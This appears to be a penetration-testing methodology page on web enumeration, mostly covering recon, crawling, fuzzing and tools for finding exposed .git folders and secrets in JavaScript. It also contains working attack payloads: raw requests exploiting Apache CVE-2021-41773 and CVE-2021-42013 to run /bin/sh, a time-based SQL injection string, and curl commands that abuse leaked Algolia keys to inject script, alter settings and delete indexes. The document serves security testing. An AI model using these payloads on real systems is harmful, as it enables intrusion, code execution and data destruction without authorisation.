Web Enumeration

Recon, fuzzing and crawling

Recon

Also check for other exposed ports. Ex: 22, look for regsshion, etc. See Protocols

nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
LogoGitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub
LogoGitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Leverage Shodan and find CVE

LogoGitHub - iamunixtz/Lazy-Hunter: LazyHunter is an automated reconnaissance tool designed for bug hunters, leveraging Shodan's InternetDB and CVEDB APIsGitHub

EyeWitness or Aquatone - See Information Gathering

Fingerprinting / Crawling
LogoGitHub - blackhatethicalhacking/SecretOpt1c: SecretOpt1c is a Red Team tool that helps uncover sensitive information in websites using ACTIVE and PASSIVE Techniques for Superior Accuracy!GitHub
LogoGitHub - chm0dx/creepyCrawler: OSINT tool to crawl a site and extract useful recon info.GitHub

SSL / TLS

LogoGitHub - testssl/testssl.sh: Testing TLS/SSL encryption anywhere on any portGitHub
LogoGitHub - projectdiscovery/tlsx: Fast and configurable TLS grabber focused on TLS based data collection.GitHub

HTTP/2 - DoS

Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487

LogoGitHub - bcdannyboy/CVE-2023-44487: Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487GitHub

HTTP Downgrading

HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2.

  1. Open Burp Suite and Navigate to Proxy → HTTP History

  2. Locate the request that is currently using HTTP/2.

  3. Send the Request to Repeater

  4. In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol

  5. Change HTTP Version to HTTP/1.1

  6. Click "Send" in Repeater.

If successful, you should receive a valid response, confirming the server accepts HTTP/1.1.

Now, test for request smuggling

HTTP Request Smuggling

HTTP Methods

LogoGitHub - ShutdownRepo/httpmethods: HTTP verb tampering & methods enumerationGitHub
HTTP Verb Tampering

Apache Vulnerability Testing

LogoGitHub - mrmtwoj/apache-vulnerability-testing: Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709GitHub
LogoGitHub - TAM-K592/CVE-2024-40725-CVE-2024-40898: CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.GitHub

  • CVE-2021-41773 (RCE and LFI)

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id

  • CVE-2021-42013 (RCE and LFI)

POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id
LogoBug-Bounty-Methodology/Technologies/Apache HTTP Server.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Scan for credz

LogoGitHub - m14r41/scan4secrets: SAST and DAST Scan Supported with 400 plus rules available for secrets and allow you add your own wordlist as well. lightweight source code scanner and for URL that detects hardcoded secrets like API keys, credentials, and sensitive information across files and folders.GitHub

Header Exploit

LogoGitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Common files

LogoGitHub - Bo0oM/fuzz.txt: Potentially dangerous filesGitHub
.git
.gitkeep
.git-rewrite
.gitreview
.git/HEAD
.gitconfig
.git/index
.git/logs
.svnignore
.gitattributes
.gitmodules
.svn/entries
.DS_Store
.env
debug.log
backup/
admin.bak
database.sql
composer.lock

robots.txt

-> robofinder: search for and retrieve historical robots.txt files from Archive.org for any given website.

LogoGitHub - Spix0r/robofinder: Robofinder retrieves historical #robots.txt files from #Archive.org, allowing you to uncover previously disallowed directories and paths for any domain—essential for deepening your #OSINT and #recon process.GitHub

.git

.svn

.DS_Store

.env

LogoGitHub - lijiejie/ds_store_exp: A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.GitHub
# python ds_store_exp.py http://10.13.X.X/.DS_Store   
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
Logo.DS_Store Files and Why You Should Know About Them - BuildThisBuildThis
LogoWhat happened After I Scanned 2.6 Million Domains for Exposed .DS_Store Files | HackerNoonhackernoon
LogoThe risk of .DS_Store - CyberAntCyberAnt

Cloudflare

Real IP adress

Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

LogoGitHub - musana/CF-Hero: CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applicationsGitHub

Internal IP leakage

/cdn-cgi/trace on live hosts — it leaks internal IPs

sitemap.xml

Time based SQL injection: sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s

target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
SQL Injection

Misconfigurations on popular third-party services

https://github.com/intigriti/misconfig-mappergithub.com
LogoExploring Third-Party Services for Open Signups: Security Risks and Best PracticesIntigriti

Git Exposed

DotGit Extension - Firefox and Chrome https://addons.mozilla.org/en-US/firefox/addon/dotgit/

cat domains.txt | nuclei -t gitExposed.yaml

Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml

id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" #/.git/logs/HEAD
          - "ref: refs/heads/" #/.git/HEAD
          - "logallrefupdates = true" #/.git/config
          - "repositoryformatversion = 0" #/.git/config
          - "Index of /" #/.git/
          - "You do not have permission to access /.git/" #403_/.git
          - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description

      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}"  #/.git/logs/

    stop-at-first-match: true

.git found => download the target .git folder

wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/

Or with tools:

The best tool is goop

LogoGitHub - nyancrimew/goop: Yet another tool to dump a git repository from a website, focused on as-complete-as-possible dumps and handling weird edge-cases.GitHub
$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb
LogoGitHub - lijiejie/GitHack: A `.git` folder disclosure exploitGitHub
LogoGitHub - WangYihang/GitHacker: 🕷️ A `.git` folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.GitHub
LogoGitHub - Ebryx/GitDump: A pentesting tool that dumps the source code from .git even when the directory traversal is disabledGitHub

After that, search for creds, vulnerabilities, etc:

Credentials in git reposGitHub - finding vulnerabilities

SVN Expoxed

LogoGitHub - anantshri/svn-extractor: simple script to extract all web resources by means of .SVN folder exposed over network.GitHub
./svn-extractor.py --url http://url.com --match database.php

PHPMyAdmin

target[.]com/phpmyadmin/setup/index.php ==> 301 to login page

target[.]com/phpMyAdmin/setup/index.php ==> 200 to phpmyadmin setup

AdminDirectoryFinder

LogoGitHub - tausifzaman/AdminDirectoryFinder: Admin Directory Finder is a tool designed to scan and identify directories under admin paths, such as admin/dashboard.php. It helps in security testing by detecting hidden or sensitive admin panels within a web application. Ideal for penetration testers and developers to ensure proper access control and security measures.GitHub

WSAAR

LogoGitHub - Nishacid/WSAAR: Auto-Recon script that will help you in the Burp Suite Certified Practitioner Examor with any web-security lab.GitHub

OWASP Noir

LogoGitHub - owasp-noir/noir: Attack surface detector that identifies endpoints by static analysisGitHub
$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan

URLScan.io

Check URLScan as a complement to Wayback Machine

Information Gathering

WaybackLister

Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings

LogoGitHub - anmolksachan/wayBackLister: A New Approach to Directory Bruteforce with WaybackLister v1.0GitHub
python waybacklister.py -d target.com

Wayback Machine

LogoGitHub - mhmdiaa/chronos: Wayback Machine OSINT FrameworkGitHub
# RECON METHOD BY ~/.COFFINXP

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Information Gathering
LogoGitHub - AnonKryptiQuz/TimeVault: TimeVault is a specialized automated tool designed to detect potential information disclosure vulnerabilities in web applications by leveraging archived URLs from the Wayback Machine.GitHub
LogoGitHub - xnl-h4ck3r/waymore: Find way more from the Wayback Machine!GitHub
waymore -i target.com -mode U -oU urls.txt

Download pages and extract JS (mode R)

waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/*
LogoGitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

Backup Files 

ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50  -fs 0 -c -x http://localip:8080
Logopayloads/backup_files_only.txt at main · coffinxp/payloadsGitHub

Fuzzili

LogoGitHub - musana/fuzzuli: fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.GitHub
echo http://target.com | fuzzuli -p

Burp Extension

LogoBackup Finder

Archived Backups

LogoGitHub - anmolksachan/WayBackupFinder: A passive way to find backups/ sensitive information.GitHub
LogoUnlock Hidden Backups with wayBackupFinder.pyMedium

Look for metadata

Extract URLs and paths from web pages

Manually

https://0-a.nl/jsendpoints.txt
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Open Console (ctrl + shift + i) + Allow pasting ("autoriser le collage") + copy paste JS code + click on bookmark

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

Crawling

Gourlex

gourlex -t domain.com
LogoGitHub - trap-bytes/gourlex: Gourlex is a simple tool that can be used to extract URLs and paths from web pages.GitHub

xnLinkFinder

LogoGitHub - xnl-h4ck3r/xnLinkFinder: A python tool used to discover endpoints for a given targetGitHub
xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v

Command breakdown: 

-i http://bugcrowd.com  → Target domain 
-sp https://bugcrowd.com  → Scope prefix 
-sf "bugcrowd.*" → Scope filter 
-d 2 → Crawl depth 
https://github.com/mhmdiaa/chronos
-v → Verbose output

Hakrawler

LogoGitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub
echo https://google.com | hakrawler

Waybackurls

LogoGitHub - tomnomnom/waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domainGitHub

Katana & Urlfinder

katana -u https://tesla.com
LogoGitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.GitHub
urlfinder -d tesla.com
LogoGitHub - projectdiscovery/urlfinder: A high-speed tool for passively gathering URLs, optimized for efficient and comprehensive web asset discovery without active scanning.GitHub

GetAllURL - gau

LogoGitHub - lc/gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.GitHub
gau https://target.com

LinkFinder

LogoGitHub - GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript filesGitHub
python3 linkfinder.py -i https://example.com/app.js
$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli

GoLinkFinder

Faster than LinkFinder

LogoGitHub - 0xsha/GoLinkFinder: A fast and minimal JS endpoint extractorGitHub
golinkfinder -file js_files.txt -output results.json

LazyEgg

LogoGitHub - schooldropout1337/lazyeggGitHub

ReconSpider

See Fingerprinting / Crawling

Secrets in Response

Detects sensitive information leaks in HTTP responses using custom regex-based signatures

LogoGitHub - Ahmex000/Y-Leak-Scanner.go: A highly efficient and powerful Go script designed to detect sensitive data leaks in JavaScript files.GitHub

Metadata

Metadata and Hidden infos

JS Files

Sensitive JS Files

ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
Logopayloads/senstivejs.txt at main · 0xSs0rZ/payloadsGitHub
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js

Burp

Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA

LogoJavaScript Analysis for Pentesterskpwn.de
wget -i urls.txt

Detect secrets

./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"

Burp Extension

LogoTruffleHog Integration

Code Analysis

Code Analysis
semgrep scan --config auto

JSFScan.sh

1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
LogoGitHub - KathanP19/JSFScan.sh: Automation for javascript recon in bug bounty.GitHub
bash JFScan.sh -l target.txt --all -r -o outputdir

Morgan

Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites

LogoGitHub - VFA250/Morgan: Morgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.GitHub

Gouge - Burp extension to extract URLs which are seen in JS files

LogoGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp SuiteGitHub

GetJS

LogoGitHub - 003random/getJS: A tool to fastly get all javascript sources/filesGitHub

JSHunter

Endpoint Extraction and Sensitive Data Detection

cat urls.txt | grep "\.js" | jshunter
LogoGitHub - cc1a2b/jshunter: JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers and security researchers.GitHub

Javascript Deobfuscator

LogoGitHub - ben-sb/javascript-deobfuscator: General purpose JavaScript deobfuscatorGitHub

Online

LogoJavaScript Deobfuscator

API Endpoint - Burp History

Logodump/json2paths at master · s0md3v/dumpGitHub

API Endpoint in JS File

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

JSNinja

LogoGitHub - iamunixtz/JSNinja: JSNinja is a powerful tool designed for security researchers and developers looking to extract sensitive information and Urls from JavaScript files.GitHub

JS Link Finder

LogoJS Link Finder

Jsluice

LogoGitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub
LogoGitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub
API

Sensitive data in JS Files

Top 25 JavaScript path files used to store sensitive information

/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
LogoGitHub - BishopFox/jsluice: Extract URLs, paths, secrets, and other interesting bits from JavaScriptGitHub
LogoGitHub - iamunixtz/JSNinja: JSNinja is a powerful tool designed for security researchers and developers looking to extract sensitive information and Urls from JavaScript files.GitHub
Sensitive Data (API Key, JWT token, etc.) Exposed

JS Miner - Burp Extension

X-Keys - Burp Extension

LogoGitHub - vsec7/BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, token, or etc.) from a webpage.GitHub

jsluice++ - Burp Extension

LogoGitHub - 0x999-x/jsluicepp: jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic using the CLI tool jsluiceGitHub

SecretFinder

LogoGitHub - m4ll0k/SecretFinder: SecretFinder - A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript filesGitHub

Mantra

LogoGitHub - MrEmpy/mantra: 「🔑」A tool used to hunt down API key leaks in JS files and pagesGitHub

Testing API Key

LogoGitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.GitHub

Google Maps API Key

LogoGitHub - ozguralp/gmapsapiscannerGitHub

Algolia API Key

LogoAlgolia MisconfigurationSecjuice
LogoGitHub - streaak/keyhacks: Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.GitHub
LogoAlgolia API Key Exploitation leads to $1000 Bounty (P2) on Private programMedium

Check ACL:

https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY

The most damaging permissions are

  • addObject: Allows adding/updating an object in the index. (Copying/moving indices are also allowed with this permission.)

  • deleteObject: Allows deleting an existing object.

  • deleteIndex: Allows deleting an index (will break search completely)

  • editSettings: Allows changing index settings. - this also allows you to run javascript when the search is used.

  • listIndexes: Allows listing all accessible indices.

  • logs: this will allow you to view the search logs, which can include IP Addresses and sensitive cookies.

Abuse editSettings to put an XSS paylaod:

curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'

List indexes

curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/" \
  -H "X-Algolia-API-Key: {api-key}" \
  -H "X-Algolia-Application-Id: {appID}"

Retrieve/read the data of a resource from the server:

  • settings

curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>'

  • Specific index

curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \
  -H "X-Algolia-API-Key: {apikey}" \
  -H "X-Algolia-Application-Id: {appID}"

Update a resource on the server.

curl -X PATCH --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header 'content-type: application/json' --header 'x-algolia-api-key: <example-key>' --header 'x-algolia-application-id: <example-application-id>' --data '{"highlightPreTag": "This is hacked"}'

Delete Index - DON'T DO THIS ON PRODUCTION ENVIRONMENT

curl -X DELETE \
  "https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"

Hidden Parameter

This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible

Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

Parameters fuzzing

Burp - Param Miner

right-click, extension>Param Miner> Guess params> Guess GET parameters.

Burp - GAP

GetAllParams

LogoGitHub - xnl-h4ck3r/GAP-Burp-Extension: Burp ExtensionsGitHub

x8

Hidden parameters discovery

LogoGitHub - Sh1Yo/x8: Hidden parameters discovery suiteGitHub

Arjun

LogoGitHub - s0md3v/Arjun: HTTP parameter discovery suite.GitHub
LogoHacker tools: Arjun – The parameter discovery toolIntigriti
$ python3 /opt/Arjun/arjun.py -u http://target_address.com

$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json

If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:

$ python3 /opt/Arjun/arjun.py -i burp_targets.txt

Parmahunter

LogoGitHub - nullenc0de/paramhunter: Looks for parameters in urlsGitHub

Wordlists

Try /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt first, then https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt

Fuzzing
Logofuzz.txt/fuzz.txt at master · Bo0oM/fuzz.txtGitHub
LogoGitHub - p0dalirius/webapp-wordlists: This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.GitHub
LogoGitHub - Karanxa/Bug-Bounty-Wordlists: A repository that includes all the important wordlists used while bug hunting.GitHub
cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10

Fuzz using different HTTP methods

ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD

Admin interfaces

LogoBug-Bounty-Wordlists/admin.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Backups

LogoBug-Bounty-Wordlists/backup_files_only.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub
LogoBug-Bounty-Wordlists/backup_files_with_path.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Config files

LogoBug-Bounty-Wordlists/config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub
LogoBug-Bounty-Wordlists/webconfig.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub
LogoBug-Bounty-Wordlists/git_config.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

SQL files

LogoBug-Bounty-Wordlists/sql.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Vulnerability Assessment

Vulnerability ScannersPort Scan
sudo nmap 10.129.2.28 -p 80 -sV --script vuln 

Nmap scan report for 10.129.2.28
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.3.4
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
LogoGitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.GitHub
LogoGitHub - vulnersCom/nmap-vulners: NSE script based on Vulners.com APIGitHub

Lostfuzzer

LogoGitHub - coffinxp/lostfuzzer: A Bash script for automated nuclei dast scanning by using passive urlsGitHub

Admin interface

Password lists

CMS

LogoGitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSsGitHub
CMS

Crawling

Crawl with 2 separate user-agent

Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes!

gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt

Gospider

LogoGitHub - jaeles-project/gospider: Gospider - Fast web spider written in GoGitHub
LogoGoSpider - Hacker Tools: Enumerate the web! 👩‍💻Intigriti

Hakrawler

LogoGitHub - hakluke/hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web applicationGitHub

With Burp

LogoRunning a full crawl and auditBurp_Suite

With Zap

LogoThe ZAP Homepage
sudo snap install zaproxy --classic

  • Spidering

  • Fuzzing

Fuzz

Wordlists

Fuzzing
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS

Admin interface=> Password guessing

CMS 

curl -IL https://www.inlanefreight.com

Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone

Information Gathering
whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24

DNS Subdomain Enumeration

DNS Subdomain Enumeration

Cloudflare Bypass for Web Scraping

LogoGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscrapingGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousAvoid Aggressive ScanningNextFuzzing

Last updated